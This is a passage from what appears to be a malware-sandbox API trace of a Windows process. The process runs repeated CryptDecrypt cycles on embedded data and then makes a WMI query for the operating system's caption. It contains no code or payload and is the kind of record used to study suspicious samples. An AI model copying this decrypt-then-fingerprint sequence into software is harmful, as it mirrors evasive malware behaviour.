(hKey=0x4e1640) returned 1 [0152.974] CryptReleaseContext (hProv=0x4ea398, dwFlags=0x0) returned 1 [0152.974] CryptReleaseContext (hProv=0x4ea398, dwFlags=0x0) returned 1 [0152.974] CryptAcquireContextW (in: phProv=0x19f42c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x19f42c*=0x4ea310) returned 1 [0152.975] CryptImportKey (in: hProv=0x4ea310, pbData=0x2303ba8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x19f3fc | out: phKey=0x19f3fc*=0x4e1ac0) returned 1 [0152.975] CryptContextAddRef (hProv=0x4ea310, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.975] CryptContextAddRef (hProv=0x4ea310, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.975] CryptDuplicateKey (in: hKey=0x4e1ac0, pdwReserved=0x0, dwFlags=0x0, phKey=0x19f3ec | out: phKey=0x19f3ec*=0x4e19c0) returned 1 [0152.975] CryptContextAddRef (hProv=0x4ea310, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.976] CryptSetKeyParam (hKey=0x4e19c0, dwParam=0x4, pbData=0x2304308*=0x1, dwFlags=0x0) returned 1 [0152.976] CryptSetKeyParam (hKey=0x4e19c0, dwParam=0x1, pbData=0x23042d4, dwFlags=0x0) returned 1 [0152.976] CryptDecrypt (in: hKey=0x4e19c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x23043e8, pdwDataLen=0x19f42c | out: pbData=0x23043e8, pdwDataLen=0x19f42c) returned 1 [0152.976] CryptDecrypt (in: hKey=0x4e19c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2304430, pdwDataLen=0x19f42c | out: pbData=0x2304430, pdwDataLen=0x19f42c) returned 0 [0152.976] CryptDestroyKey (hKey=0x4e1ac0) returned 1 [0152.976] CryptReleaseContext (hProv=0x4ea310, dwFlags=0x0) returned 1 [0152.976] CryptReleaseContext (hProv=0x4ea310, dwFlags=0x0) returned 1 [0152.976] CryptAcquireContextW (in: phProv=0x19f42c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x19f42c*=0x4e9cb0) returned 1 [0152.977] CryptImportKey (in: hProv=0x4e9cb0, pbData=0x23045a0, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x19f3fc | out: phKey=0x19f3fc*=0x4e17c0) returned 1 [0152.977] CryptContextAddRef (hProv=0x4e9cb0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.978] CryptContextAddRef (hProv=0x4e9cb0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.978] CryptDuplicateKey (in: hKey=0x4e17c0, pdwReserved=0x0, dwFlags=0x0, phKey=0x19f3ec | out: phKey=0x19f3ec*=0x4e1700) returned 1 [0152.978] CryptContextAddRef (hProv=0x4e9cb0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.978] CryptSetKeyParam (hKey=0x4e1700, dwParam=0x4, pbData=0x2304d00*=0x1, dwFlags=0x0) returned 1 [0152.978] CryptSetKeyParam (hKey=0x4e1700, dwParam=0x1, pbData=0x2304ccc, dwFlags=0x0) returned 1 [0152.978] CryptDecrypt (in: hKey=0x4e1700, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2304de0, pdwDataLen=0x19f42c | out: pbData=0x2304de0, pdwDataLen=0x19f42c) returned 1 [0152.978] CryptDecrypt (in: hKey=0x4e1700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2304e2c, pdwDataLen=0x19f42c | out: pbData=0x2304e2c, pdwDataLen=0x19f42c) returned 0 [0152.979] CryptDestroyKey (hKey=0x4e17c0) returned 1 [0152.979] CryptReleaseContext (hProv=0x4e9cb0, dwFlags=0x0) returned 1 [0152.979] CryptReleaseContext (hProv=0x4e9cb0, dwFlags=0x0) returned 1 [0152.979] CryptAcquireContextW (in: phProv=0x19f42c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x19f42c*=0x4ea5b8) returned 1 [0152.980] CryptImportKey (in: hProv=0x4ea5b8, pbData=0x2304fb8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x19f3fc | out: phKey=0x19f3fc*=0x4e1400) returned 1 [0152.980] CryptContextAddRef (hProv=0x4ea5b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.980] CryptContextAddRef (hProv=0x4ea5b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.980] CryptDuplicateKey (in: hKey=0x4e1400, pdwReserved=0x0, dwFlags=0x0, phKey=0x19f3ec | out: phKey=0x19f3ec*=0x4e1540) returned 1 [0152.980] CryptContextAddRef (hProv=0x4ea5b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.981] CryptSetKeyParam (hKey=0x4e1540, dwParam=0x4, pbData=0x2305728*=0x1, dwFlags=0x0) returned 1 [0152.981] CryptSetKeyParam (hKey=0x4e1540, dwParam=0x1, pbData=0x23056f4, dwFlags=0x0) returned 1 [0152.981] CryptDecrypt (in: hKey=0x4e1540, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x230580c, pdwDataLen=0x19f3fc | out: pbData=0x230580c, pdwDataLen=0x19f3fc) returned 1 [0152.981] CryptDecrypt (in: hKey=0x4e1540, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x230586c, pdwDataLen=0x19f42c | out: pbData=0x230586c, pdwDataLen=0x19f42c) returned 1 [0152.981] CryptDecrypt (in: hKey=0x4e1540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x23058b8, pdwDataLen=0x19f42c | out: pbData=0x23058b8, pdwDataLen=0x19f42c) returned 0 [0152.981] CryptDestroyKey (hKey=0x4e1400) returned 1 [0152.981] CryptReleaseContext (hProv=0x4ea5b8, dwFlags=0x0) returned 1 [0152.981] CryptReleaseContext (hProv=0x4ea5b8, dwFlags=0x0) returned 1 [0152.981] CryptAcquireContextW (in: phProv=0x19f42c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x19f42c*=0x4e9c28) returned 1 [0152.982] CryptImportKey (in: hProv=0x4e9c28, pbData=0x2305a78, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x19f3fc | out: phKey=0x19f3fc*=0x4e1740) returned 1 [0152.982] CryptContextAddRef (hProv=0x4e9c28, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.983] CryptContextAddRef (hProv=0x4e9c28, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.983] CryptDuplicateKey (in: hKey=0x4e1740, pdwReserved=0x0, dwFlags=0x0, phKey=0x19f3ec | out: phKey=0x19f3ec*=0x4e1780) returned 1 [0152.983] CryptContextAddRef (hProv=0x4e9c28, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.983] CryptSetKeyParam (hKey=0x4e1780, dwParam=0x4, pbData=0x23061e8*=0x1, dwFlags=0x0) returned 1 [0152.983] CryptSetKeyParam (hKey=0x4e1780, dwParam=0x1, pbData=0x23061b4, dwFlags=0x0) returned 1 [0152.983] CryptDecrypt (in: hKey=0x4e1780, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x23062cc, pdwDataLen=0x19f3fc | out: pbData=0x23062cc, pdwDataLen=0x19f3fc) returned 1 [0152.984] CryptDecrypt (in: hKey=0x4e1780, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x230632c, pdwDataLen=0x19f42c | out: pbData=0x230632c, pdwDataLen=0x19f42c) returned 1 [0152.984] CryptDecrypt (in: hKey=0x4e1780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x230636c, pdwDataLen=0x19f42c | out: pbData=0x230636c, pdwDataLen=0x19f42c) returned 0 [0152.984] CryptDestroyKey (hKey=0x4e1740) returned 1 [0152.984] CryptReleaseContext (hProv=0x4e9c28, dwFlags=0x0) returned 1 [0152.984] CryptReleaseContext (hProv=0x4e9c28, dwFlags=0x0) returned 1 [0152.984] CryptAcquireContextW (in: phProv=0x19f42c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x19f42c*=0x4ea288) returned 1 [0152.985] CryptImportKey (in: hProv=0x4ea288, pbData=0x23064f8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x19f3fc | out: phKey=0x19f3fc*=0x4e1380) returned 1 [0152.985] CryptContextAddRef (hProv=0x4ea288, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.985] CryptContextAddRef (hProv=0x4ea288, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.985] CryptDuplicateKey (in: hKey=0x4e1380, pdwReserved=0x0, dwFlags=0x0, phKey=0x19f3ec | out: phKey=0x19f3ec*=0x4e1740) returned 1 [0152.986] CryptContextAddRef (hProv=0x4ea288, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.986] CryptSetKeyParam (hKey=0x4e1740, dwParam=0x4, pbData=0x2306c58*=0x1, dwFlags=0x0) returned 1 [0152.986] CryptSetKeyParam (hKey=0x4e1740, dwParam=0x1, pbData=0x2306c24, dwFlags=0x0) returned 1 [0152.986] CryptDecrypt (in: hKey=0x4e1740, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2306d38, pdwDataLen=0x19f42c | out: pbData=0x2306d38, pdwDataLen=0x19f42c) returned 1 [0152.986] CryptDecrypt (in: hKey=0x4e1740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2306d7c, pdwDataLen=0x19f42c | out: pbData=0x2306d7c, pdwDataLen=0x19f42c) returned 0 [0152.986] CryptDestroyKey (hKey=0x4e1380) returned 1 [0152.986] CryptReleaseContext (hProv=0x4ea288, dwFlags=0x0) returned 1 [0152.986] CryptReleaseContext (hProv=0x4ea288, dwFlags=0x0) returned 1 [0153.342] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2d4 [0153.344] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2a4 [0153.367] SetEvent (hEvent=0x2a4) returned 1 [0153.401] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19e514*=0x2d4, lpdwindex=0x19e334 | out: lpdwindex=0x19e334) returned 0x0 [0154.049] CoGetContextToken (in: pToken=0x19e3e0 | out: pToken=0x19e3e0) returned 0x0 [0154.049] CoGetContextToken (in: pToken=0x19e340 | out: pToken=0x19e340) returned 0x0 [0154.050] WbemDefPath:IUnknown:QueryInterface (in: This=0x4f6390, riid=0x19e410*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19e40c | out: ppvObject=0x19e40c*=0x4f6390) returned 0x0 [0154.050] WbemDefPath:IUnknown:AddRef (This=0x4f6390) returned 0x3 [0154.051] WbemDefPath:IUnknown:Release (This=0x4f6390) returned 0x2 [0154.056] WbemDefPath:IWbemPath:SetText (This=0x4f6390, uMode=0x4, pszPath="//./root/cimv2") returned 0x0 [0154.058] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x4f6390, puCount=0x19ec8c | out: puCount=0x19ec8c*=0x2) returned 0x0 [0154.059] WbemDefPath:IWbemPath:GetText (in: This=0x4f6390, lFlags=4, puBuffLength=0x19ec88*=0x0, pszText=0x0 | out: puBuffLength=0x19ec88*=0xf, pszText=0x0) returned 0x0 [0154.059] WbemDefPath:IWbemPath:GetText (in: This=0x4f6390, lFlags=4, puBuffLength=0x19ec88*=0xf, pszText="00000000000000" | out: puBuffLength=0x19ec88*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0154.255] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19eb38*=0x368, lpdwindex=0x19e9ec | out: lpdwindex=0x19e9ec) returned 0x0 [0160.153] CoGetContextToken (in: pToken=0x19e8f8 | out: pToken=0x19e8f8) returned 0x0 [0160.153] CoGetContextToken (in: pToken=0x19e8a0 | out: pToken=0x19e8a0) returned 0x0 [0160.153] IUnknown:QueryInterface (in: This=0x4d1158, riid=0x6cc38724*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e880 | out: ppvObject=0x19e880*=0x4d1168) returned 0x0 [0160.154] CObjectContext::ContextCallback () returned 0x0 [0160.195] IUnknown:Release (This=0x4d1168) returned 0x1 [0160.195] CoUnmarshalInterface (in: pStm=0x504d90, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19e8e8 | out: ppv=0x19e8e8*=0x513fa8) returned 0x0 [0160.196] CoMarshalInterface (pStm=0x504d90, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x513fa8, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0160.197] WbemLocator:IUnknown:QueryInterface (in: This=0x513fa8, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e78c | out: ppvObject=0x19e78c*=0x513fa8) returned 0x0 [0160.197] WbemLocator:IUnknown:QueryInterface (in: This=0x513fa8, riid=0x6ccbfdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e748 | out: ppvObject=0x19e748*=0x0) returned 0x80004002 [0160.198] WbemLocator:IUnknown:QueryInterface (in: This=0x513fa8, riid=0x6ccbfb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e564 | out: ppvObject=0x19e564*=0x0) returned 0x80004002 [0160.199] WbemLocator:IUnknown:QueryInterface (in: This=0x513fa8, riid=0x6ccc056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e33c | out: ppvObject=0x19e33c*=0x0) returned 0x80004002 [0160.200] WbemLocator:IUnknown:AddRef (This=0x513fa8) returned 0x3 [0160.201] WbemLocator:IUnknown:QueryInterface (in: This=0x513fa8, riid=0x6ccc0208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e0a4 | out: ppvObject=0x19e0a4*=0x0) returned 0x80004002 [0160.201] WbemLocator:IUnknown:QueryInterface (in: This=0x513fa8, riid=0x6ccc015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e054 | out: ppvObject=0x19e054*=0x0) returned 0x80004002 [0160.201] WbemLocator:IUnknown:QueryInterface (in: This=0x513fa8, riid=0x6cb940e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e060 | out: ppvObject=0x19e060*=0x513f04) returned 0x0 [0160.201] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x513f04, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e068 | out: pCid=0x19e068*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0160.201] WbemLocator:IUnknown:Release (This=0x513f04) returned 0x3 [0160.201] CoGetContextToken (in: pToken=0x19e0c0 | out: pToken=0x19e0c0) returned 0x0 [0160.201] IUnknown:QueryInterface (in: This=0x4d10a0, riid=0x6cc04564*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e084 | out: ppvObject=0x19e084*=0x4d10ac) returned 0x0 [0160.202] IComThreadingInfo:GetCurrentApartmentType (in: This=0x4d10ac, pAptType=0x19e0c8 | out: pAptType=0x19e0c8*=3) returned 0x0 [0160.202] IUnknown:Release (This=0x4d10ac) returned 0x0 [0160.202] CoGetObjectContext (in: riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5093ac | out: ppv=0x5093ac*=0x4d10a0) returned 0x0 [0160.202] CoGetContextToken (in: pToken=0x19e4c8 | out: pToken=0x19e4c8) returned 0x0 [0160.202] WbemLocator:IUnknown:QueryInterface (in: This=0x513fa8, riid=0x6ccc0448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e558 | out: ppvObject=0x19e558*=0x513f8c) returned 0x0 [0160.202] WbemLocator:IRpcOptions:Query (in: This=0x513f8c, pPrx=0x513fa8, dwProperty=2, pdwValue=0x19e580 | out: pdwValue=0x19e580) returned 0x0 [0160.202] WbemLocator:IUnknown:Release (This=0x513f8c) returned 0x3 [0160.203] WbemLocator:IUnknown:Release (This=0x513fa8) returned 0x2 [0160.203] WbemLocator:IUnknown:Release (This=0x513fa8) returned 0x1 [0160.204] CoGetContextToken (in: pToken=0x19e838 | out: pToken=0x19e838) returned 0x0 [0160.204] WbemLocator:IUnknown:AddRef (This=0x513fa8) returned 0x2 [0160.205] WbemLocator:IUnknown:QueryInterface (in: This=0x513fa8, riid=0x6c241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eaf0 | out: ppvObject=0x19eaf0*=0x513f84) returned 0x0 [0160.205] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x513f84, pProxy=0x513fa8, pAuthnSvc=0x19eb40, pAuthzSvc=0x19eb3c, pServerPrincName=0x19eb34, pAuthnLevel=0x19eb38, pImpLevel=0x19eb28, pAuthInfo=0x19eb2c, pCapabilites=0x19eb30 | out: pAuthnSvc=0x19eb40*=0xa, pAuthzSvc=0x19eb3c*=0x0, pServerPrincName=0x19eb34, pAuthnLevel=0x19eb38*=0x6, pImpLevel=0x19eb28*=0x2, pAuthInfo=0x19eb2c, pCapabilites=0x19eb30*=0x1) returned 0x0 [0160.205] WbemLocator:IUnknown:Release (This=0x513f84) returned 0x2 [0160.205] WbemLocator:IUnknown:QueryInterface (in: This=0x513fa8, riid=0x6c2410f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eae4 | out: ppvObject=0x19eae4*=0x513fa8) returned 0x0 [0160.205] WbemLocator:IUnknown:QueryInterface (in: This=0x513fa8, riid=0x6c241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eae0 | out: ppvObject=0x19eae0*=0x513f84) returned 0x0 [0160.205] WbemLocator:IClientSecurity:SetBlanket (This=0x513f84, pProxy=0x513fa8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0160.206] WbemLocator:IUnknown:Release (This=0x513f84) returned 0x3 [0160.206] WbemLocator:IUnknown:Release (This=0x513fa8) returned 0x2 [0160.206] CoTaskMemFree (pv=0x510770) [0160.206] WbemLocator:IUnknown:Release (This=0x513fa8) returned 0x1 [0160.206] SysStringLen (param_1=0x0) returned 0x0 [0160.207] CoGetContextToken (in: pToken=0x19eaa8 | out: pToken=0x19eaa8) returned 0x0 [0160.207] CoGetContextToken (in: pToken=0x19ea08 | out: pToken=0x19ea08) returned 0x0 [0160.207] WbemLocator:IUnknown:QueryInterface (in: This=0x513fa8, riid=0x19ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x19ead4 | out: ppvObject=0x19ead4*=0x4e2878) returned 0x0 [0160.208] WbemLocator:IUnknown:AddRef (This=0x4e2878) returned 0x3 [0160.208] WbemLocator:IUnknown:Release (This=0x4e2878) returned 0x2 [0160.208] CoGetContextToken (in: pToken=0x19ea68 | out: pToken=0x19ea68) returned 0x0 [0160.208] WbemLocator:IUnknown:AddRef (This=0x4e2878) returned 0x3 [0160.211] WbemLocator:IUnknown:QueryInterface (in: This=0x4e2878, riid=0x6c241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eaf0 | out: ppvObject=0x19eaf0*=0x513f84) returned 0x0 [0160.211] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x513f84, pProxy=0x4e2878, pAuthnSvc=0x19eb40, pAuthzSvc=0x19eb3c, pServerPrincName=0x19eb34, pAuthnLevel=0x19eb38, pImpLevel=0x19eb28, pAuthInfo=0x19eb2c, pCapabilites=0x19eb30 | out: pAuthnSvc=0x19eb40*=0xa, pAuthzSvc=0x19eb3c*=0x0, pServerPrincName=0x19eb34, pAuthnLevel=0x19eb38*=0x6, pImpLevel=0x19eb28*=0x2, pAuthInfo=0x19eb2c, pCapabilites=0x19eb30*=0x1) returned 0x0 [0160.211] WbemLocator:IUnknown:Release (This=0x513f84) returned 0x3 [0160.211] WbemLocator:IUnknown:QueryInterface (in: This=0x4e2878, riid=0x6c2410f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eae4 | out: ppvObject=0x19eae4*=0x513fa8) returned 0x0 [0160.211] WbemLocator:IUnknown:QueryInterface (in: This=0x4e2878, riid=0x6c241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eae0 | out: ppvObject=0x19eae0*=0x513f84) returned 0x0 [0160.212] WbemLocator:IClientSecurity:SetBlanket (This=0x513f84, pProxy=0x4e2878, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0160.212] WbemLocator:IUnknown:Release (This=0x513f84) returned 0x4 [0160.212] WbemLocator:IUnknown:Release (This=0x513fa8) returned 0x3 [0160.212] CoTaskMemFree (pv=0x5103e0) [0160.213] WbemLocator:IUnknown:Release (This=0x4e2878) returned 0x2 [0160.213] SysStringLen (param_1=0x0) returned 0x0 [0160.213] CoGetContextToken (in: pToken=0x19e9d8 | out: pToken=0x19e9d8) returned 0x0 [0160.213] WbemLocator:IUnknown:AddRef (This=0x4e2878) returned 0x3 [0160.213] IWbemServices:ExecQuery (in: This=0x4e2878, strQueryLanguage="WQL", strQuery="SELECT Caption FROM Win32_OperatingSystem", lFlags=16, pCtx=0x0, ppEnum=0x19ebfc | out: ppEnum=0x19ebfc*=0x505518) returned 0x0 [0160.383] IUnknown:QueryInterface (in: This=0x505518, riid=0x6c241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea48 | out: ppvObject=0x19ea48*=0x50551c) returned 0x0 [0160.383] IClientSecurity:QueryBlanket (in: This=0x50551c, pProxy=0x505518, pAuthnSvc=0x19ea98, pAuthzSvc=0x19ea94, pServerPrincName=0x19ea8c, pAuthnLevel=0x19ea90, pImpLevel=0x19ea80, pAuthInfo=0x19ea84, pCapabilites=0x19ea88 | out: pAuthnSvc=0x19ea98*=0xa, pAuthzSvc=0x19ea94*=0x0, pServerPrincName=0x19ea8c, pAuthnLevel=0x19ea90*=0x6, pImpLevel=0x19ea80*=0x2, pAuthInfo=0x19ea84, pCapabilites=0x19ea88*=0x1) returned 0x0 [0160.383] IUnknown:Release (This=0x50551c) returned 0x1 [0160.383] IUnknown:QueryInterface (in: This=0x505518, riid=0x6c2410f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea3c | out: ppvObject=0x19ea3c*=0x5167c8) returned 0x0 [0160.384] IUnknown:QueryInterface (in: This=0x505518, riid=0x6c241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea38 | out: ppvObject=0x19ea38*=0x50551c) returned 0x0 [0160.384] IClientSecurity:SetBlanket (This=0x50551c, pProxy=0x505518, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0160.682] IUnknown:Release (This=0x50551c) returned 0x2 [0160.682] WbemLocator:IUnknown:Release (This=0x5167c8) returned 0x1 [0160.682] CoTaskMemFree (pv=0x5102c0) [0160.683] IUnknown:QueryInterface (in: This=0x505518, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e634 | out: ppvObject=0x19e634*=0x5167c8) returned 0x0 [0160.684] WbemLocator:IUnknown:QueryInterface (in: This=0x5167c8, riid=0x6ccbfdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e5f0 | out: ppvObject=0x19e5f0*=0x0) returned 0x80004002 [0160.692] WbemLocator:IUnknown:QueryInterface (in: This=0x5167c8, riid=0x6ccbfb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e40c | out: ppvObject=0x19e40c*=0x0) returned 0x80004002 [0160.766] IUnknown:QueryInterface (in: This=0x505518, riid=0x6ccc056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e1e4 | out: ppvObject=0x19e1e4*=0x0) returned 0x80004002 [0160.769] WbemLocator:IUnknown:AddRef (This=0x5167c8) returned 0x3 [0160.770] WbemLocator:IUnknown:QueryInterface (in: This=0x5167c8, riid=0x6ccc0208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19df4c | out: ppvObject=0x19df4c*=0x0) returned 0x80004002 [0160.770] WbemLocator:IUnknown:QueryInterface (in: This=0x5167c8, riid=0x6ccc015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, 